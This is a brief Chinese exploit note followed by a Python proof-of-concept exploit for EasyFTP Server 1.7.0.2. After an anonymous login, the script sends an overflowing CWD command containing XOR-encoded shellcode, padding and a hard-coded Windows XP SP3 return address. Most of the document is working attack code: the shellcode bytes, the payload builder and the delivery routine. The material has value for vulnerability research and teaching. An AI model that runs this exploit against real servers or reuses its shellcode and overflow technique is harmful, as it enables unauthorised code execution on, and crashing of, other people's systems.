程序是FTP软件
分析登录时的发包情况（先抓正常登录时客户端发送的命令）
然后在登录后发送超长的 'CWD <数据>' 造成缓冲区溢出（本例为 198 字节 shellcode + 70 字节填充 + 4 字节返回地址，共 272 字节）
熟悉 FTP命令!!
程序也会检测/过滤某些字符，所以 shellcode 看起来是经过 XOR 0x11 编码的（前面带一小段解码器，以 0x90 作为结束标记）。
还不是很清楚为什么弹框没有显示文字。
环境 : XP SP3 中文
easyftpsvr-1.7.0.2
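"""Proof-of-concept: EasyFTP Server 1.7.0.2 over-long ``CWD`` argument.

The script logs in anonymously and then sends a CWD argument laid out as
``<shellcode> <padding> <return address>``.  The original author tested
it on Windows XP SP3 (zh-CN); the return address below is specific to
that build and will not work elsewhere.  Only run this against a host
you are authorised to test.
"""
from __future__ import print_function

import socket
import sys

# Distance from the start of the CWD argument to the overwritten return
# address, as determined by the original author's crash analysis.
RET_OFFSET = 268

# 0x7D5F6FA0 -> 0x59 ``pop ecx`` on XP SP3 zh-CN.  Hard-coded, build-specific.
RET_ADDR = b'\xa0\x6f\x5f\x7d'

# 198 bytes.  The stub near the start (``xor bl, 0x11`` ... ``cmp bl, 0x90``)
# suggests the tail is XOR-0x11 encoded and terminated by an encoded 0x90
# (0x81), presumably to get past the server's character filtering -- the
# bytes are reproduced verbatim and have not been re-verified here.
SHELLCODE = (
    b'\x50\x20'
    b'\xD9\xEE'
    b'\xD9\x74\x24\xF4'
    b'\x58'
    b'\x83\xC0\x1b'
    b'\x33\xC9'
    b'\x8A\x1C\x08'
    b'\x80\xF3\x11'
    b'\x88\x1C\x08'
    b'\x41'
    b'\x80\xFB\x90'
    b'\x75\xF1'
    b'\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'
    b'\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'
    b'\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'
    b'\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'
    b'\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'
    b'\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'
    b'\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'
    b'\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'
    b'\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'
    b'\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'
    b'\x42\xee\x46\xed\x42\xee\x46\xe9\x81'
)


def build_payload(shellcode=SHELLCODE, ret_offset=RET_OFFSET, ret_addr=RET_ADDR):
    """Return the CWD argument: ``shellcode`` + ``'a'`` padding + ``ret_addr``.

    The padding is sized so that ``ret_addr`` lands exactly ``ret_offset``
    bytes into the argument.  With the defaults this is 198 + 70 + 4 = 272
    bytes.

    Raises:
        ValueError: if ``shellcode`` is longer than ``ret_offset`` (it would
            overrun the slot reserved for the return address).
    """
    pad = ret_offset - len(shellcode)
    if pad < 0:
        raise ValueError('shellcode is %d bytes, exceeds return-address offset %d'
                         % (len(shellcode), ret_offset))
    return shellcode + b'a' * pad + ret_addr


def ftp_test(ip, port, timeout=10.0):
    """Log in anonymously to ``ip:port`` and send the overflowing CWD.

    Args:
        ip: target host.
        port: target FTP control port.
        timeout: per-operation socket timeout in seconds; bounds the final
            ``recv`` so a hung (rather than crashed) server does not block
            the script forever.

    Returns:
        True if the server dropped the connection after the CWD (reset or
        closed -- the crash indicator), False if it still answered, None
        if the final read timed out (inconclusive).

    Exits with status 1 when the initial connection fails.
    """
    target = ip
    payload = build_payload()
    try:
        s = socket.create_connection((target, port), timeout)
        print("[+] Connected!")
    except socket.error as exc:
        print("[!] Connection failed: %s" % exc)
        sys.exit(1)
    try:
        print(s.recv(1024))
        s.sendall(b'USER anonymous\r\n')
        print(s.recv(1024))
        s.sendall(b'PASS anonymous\r\n')
        print(s.recv(1024))
        print("[+] Sending buffer (%d bytes)" % len(payload))
        # sendall: the command is >272 bytes, send() may write only part of it.
        s.sendall(b'CWD ' + payload + b'\r\n')
        try:
            reply = s.recv(1024)
        except socket.timeout:
            # socket.timeout is a socket.error subclass: catch it first.
            print("timeout - inconclusive")
            return None
        except socket.error:
            print("ok")  # connection reset by peer: server most likely died
            return True
        if not reply:
            print("ok")  # orderly close with no reply: server went away
            return True
        print(reply)
        print("failed")  # server still talking: the overflow did not take
        return False
    finally:
        s.close()


if __name__ == '__main__':
    host = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'
    ctrl_port = int(sys.argv[2]) if len(sys.argv) > 2 else 21
    ftp_test(host, ctrl_port)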